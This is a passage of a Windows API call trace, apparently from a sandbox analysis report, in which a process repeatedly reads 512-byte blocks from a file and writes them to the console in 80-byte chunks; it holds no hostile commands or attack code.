lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, 
lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] GetFileType (hFile=0x4c) returned 0x1 [0234.502] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.502] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.503] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.503] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] GetFileType (hFile=0x4c) returned 0x1 [0234.503] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.503] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 
0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.504] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.504] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) 
returned 1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] GetFileType (hFile=0x4c) returned 0x1 [0234.504] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.504] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.505] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.505] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] GetFileType (hFile=0x4c) returned 0x1 [0234.505] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.505] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.506] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.506] ReadFile 
(in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.506] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] GetFileType (hFile=0x4c) returned 0x1 [0234.507] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.507] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.507] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.508] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.508] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.508] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] GetFileType (hFile=0x4c) returned 0x1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] GetFileType (hFile=0x4c) returned 0x1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, 
lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] GetFileType (hFile=0x4c) returned 0x1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] GetFileType (hFile=0x4c) returned 0x1 [0234.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.508] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.700] GetFileType (hFile=0x4c) returned 0x1 [0234.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.700] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.700] GetFileType (hFile=0x4c) returned 0x1 [0234.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.700] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, 
lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.701] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.701] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] GetFileType (hFile=0x4c) returned 0x1 [0234.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.701] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.702] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.702] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0234.702] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] GetFileType (hFile=0x4c) returned 0x1 [0234.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: 